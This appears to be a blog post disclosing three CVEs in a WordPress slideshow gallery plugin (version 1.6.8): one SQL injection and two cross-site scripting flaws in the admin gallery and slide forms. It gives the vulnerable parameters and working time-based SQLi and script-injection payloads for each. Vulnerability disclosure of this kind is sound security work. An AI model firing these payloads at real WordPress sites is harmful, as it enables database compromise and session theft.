LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: October 4 2018
Tested Version: 1.6.8
Active installations: 20,000+
#1 - SQLi vulnerability in Manage Galleries - CVE-2018-18018
Affected Vectors:
- Gallery[id]
- Gallery[title]
Locate → http://localhost/wordpress/wp-admin/admin.php?page=slideshow-galleries&method=save
Enter the Payload:
- Gallery[id]=1' AND SLEEP(5) AND 'XZlZ'='XZlZ
- Gallery[title]=ansa' OR SLEEP(5) AND 'jZQR'='jZQRn
#2 - XSS vulnerability in Manage Galleries - CVE-2018-18017
Affected Vectors:
- Gallery[id]
- Gallery[title]
Locate → http://localhost/wordpress/wp-admin/admin.php?page=slideshow-galleries&method=save
Enter the Payload:
- Gallery[id]=1'"><script>alert(1);</script>
- Gallery[title]="><script>alert(2);</script>
#3 - XSS vulnerability in Manage Slides - CVE-2018-18019
Affected Vectors:
- Slide[title]
- Slide[media_file] or Slide[image_url]
Locate:
http://localhost/wordpress498/wp-admin/admin.php?page=slideshow-slides&method=save
Enter the Payload:
- Slide[title] = ansa"><script>alert(1);</script>
- Slide[media_file] or Slide[image_url]= "><script>alert(2);</script>
No comments:
Post a Comment